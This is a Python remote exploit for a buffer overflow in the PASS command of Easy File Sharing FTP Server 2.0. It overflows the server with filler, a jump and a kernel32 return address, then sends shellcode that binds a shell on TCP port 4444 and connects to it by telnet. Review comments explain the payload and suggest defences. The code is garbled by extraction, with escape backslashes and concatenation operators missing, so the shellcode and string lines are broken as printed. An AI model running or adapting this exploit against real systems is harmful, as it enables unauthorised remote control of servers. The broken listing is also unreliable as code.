Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

# Payload bytes for the bind shell the header comment says listens on TCP 4444.
# NOTE(review): extraction has mangled this block — the escape backslashes and
# the operators between fragments are gone, so as printed every line simply
# rebinds `shellcode` and only the last fragment survives. The listing is not
# runnable as shown and should be read as a historical record, not a sample.
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

def ConnectRemoteShell(target):

# Shell out to the telnet client toward the port named in the header comment.
# The operators joining the three string pieces were lost in extraction, so
# this line is not valid Python as printed. Not called from `__main__` in this
# listing.
connect = "/usr/bin/telnet " target " 4444"

# `target` comes straight from argv and is interpolated into a shell command
# string — a shell-injection sink in the script itself.
os.system(connect)

def ExploitFTP(target):

# NOTE(review): as with the payload block, escape backslashes and the `+`
# operators in this function were lost in extraction; the string lines below
# are not valid Python as printed. `print response` is Python 2 syntax.
#
# Behaviour as written: connect to the FTP control port, read the banner,
# log in as anonymous, then send a PASS command whose argument is ~2.6 KB of
# filler followed by the payload. No response code is ever checked; each
# recv() result is only printed.
#
# Defender's view: the trigger is an FTP command line far longer than any
# legitimate password. A server (or inline filter) that caps command-line
# length would reject it before it is parsed, and a long PASS argument on an
# anonymous login is a straightforward thing to alert on.
sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

# One recv() of up to 1024 bytes; the banner is printed, not validated.
response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

# Anonymous login; the reply is printed but not checked for a 331.
user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

# The oversized PASS argument is the malicious input. The socket is never
# closed after this exchange.
passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

response = tsock.recv(1024)

print response

if __name__ == '__main__':

# Python 2 entry point: the single positional argument is the target host;
# there is no port, timeout or option parsing.
try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

# The trailing `//http://...` is residue from the hosting site fused onto the
# last code line; it is not part of the script.
ExploitFTP(target)//http://www.leftworld.net
